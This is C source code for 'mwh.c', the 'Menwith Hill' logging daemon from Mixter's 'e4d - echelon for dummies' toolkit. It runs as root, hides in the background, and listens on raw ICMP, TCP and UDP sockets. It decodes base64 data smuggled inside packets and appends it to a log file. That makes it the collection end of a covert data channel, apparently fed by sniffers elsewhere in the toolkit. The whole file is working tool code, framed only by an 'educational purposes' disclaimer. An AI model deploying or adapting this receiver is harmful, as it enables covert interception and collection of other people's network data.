/*
 * e4d - echelon for dummies
 * by Mixter <mixter@newyorkoffice.com>
 *
 * mwh.c - "menwith hill" logging station
 *
 * This program is distributed for educational purposes and without any
 * explicit or implicit warranty; in no event shall the author or
 * contributors be liable for any direct, indirect or incidental damages
 * arising in any way out of the use of this software.
 *
 */

#include "e4d.h"

extern void security_through_obscurity (int);
void loggify (char *);

int
main (int argc, char **argv)
{
  char buf[BS], clear[BS];
  struct tribe *tribeh = (struct tribe *) clear;
  int isock, tsock, usock, i;
  char *p = NULL, *data = (clear + sizeof (struct tribe));
  fd_set rfds;

  if (geteuid ())
    exit (-1);

  printf ("Menwith Hill daemon starting up... =P\n");

#ifndef WINDOZE
  if (fork ())
    exit (0);
#else
  switch (fork ())
    {
    case -1:
      perror ("fork");
      exit (0);
      break;
    case 0:
      break;
    default:
      break;
    }
#endif

  isock = socket (AF_INET, SOCK_RAW, ICMP);
  tsock = socket (AF_INET, SOCK_RAW, TCP);
  usock = socket (AF_INET, SOCK_RAW, UDP);

  while (1)
    {
      FD_ZERO (&rfds);
      FD_SET (isock, &rfds);
      FD_SET (usock, &rfds);
      FD_SET (tsock, &rfds);
      if (select (usock + 1, &rfds, NULL, NULL, NULL) < 1)
	continue;
      if (FD_ISSET (isock, &rfds))
	{
	  i = read (isock, buf, BS) - (sizeof (struct ip) + sizeof (struct icmp));
	  if (i < 4)
	    continue;
	  p = (buf + sizeof (struct ip) + sizeof (struct icmp));
	  if (!isprint (p[0]))
	    continue;
	  memset (clear, 0, BS);
	  security_through_obscurity (1);
	  decode64 (p, clear, i);
	  memset (buf, 0, BS);
	  security_through_obscurity (0);
	  if ((tribeh->start == PROTO_SEP) && (tribeh->end == PROTO_SEP))
	    loggify (data);
#ifdef EBUG
          else
          printf("n0match: %c/%c/%c : %s\n", tribeh->start, tribeh->id,
                  tribeh->end, data);
#endif
	}
      if (FD_ISSET (tsock, &rfds))
	{
	  i = read (tsock, buf, BS) - (sizeof (struct ip) + sizeof (struct tcp));
	  if (i < 4)
	    continue;
	  p = (buf + sizeof (struct ip) + sizeof (struct tcp));
	  if (!isprint (p[0]))
	    continue;
	  memset (clear, 0, BS);
	  security_through_obscurity (1);
	  decode64 (p, clear, i);
	  memset (buf, 0, BS);
	  security_through_obscurity (0);
	  if ((tribeh->start == PROTO_SEP) && (tribeh->end == PROTO_SEP))
	    loggify (data);
#ifdef EBUG
          else
          printf("n0match: %c/%c/%c : %s\n", tribeh->start, tribeh->id,
                  tribeh->end, data);
#endif
	}
      if (FD_ISSET (usock, &rfds))
	{
	  i = read (usock, buf, BS) - (sizeof (struct ip) + sizeof (struct udp));
	  if (i < 4)
	    continue;
	  p = (buf + sizeof (struct ip) + sizeof (struct udp));
	  if (!isprint (p[0]))
	    continue;
	  memset (clear, 0, BS);
	  security_through_obscurity (1);
	  decode64 (p, clear, i);
	  memset (buf, 0, BS);
	  security_through_obscurity (0);
	  if ((tribeh->start == PROTO_SEP) && (tribeh->end == PROTO_SEP))
	    loggify (data);
#ifdef EBUG
          else
          printf("n0match: %c/%c/%c : %s\n", tribeh->start, tribeh->id,
                  tribeh->end, data);
#endif
	}
    }
/* 1 != 1 */
  return (0);
}

void
loggify (char *data)
{
  FILE *blacklisted441 = fopen (LOGFILE, "a");
#ifdef EBUG
  printf("logging %s\n",data);
#endif
  if (blacklisted441 == NULL)
    exit (0);			/* unf.. */
  fputs (data, blacklisted441);
  fclose (blacklisted441);
}
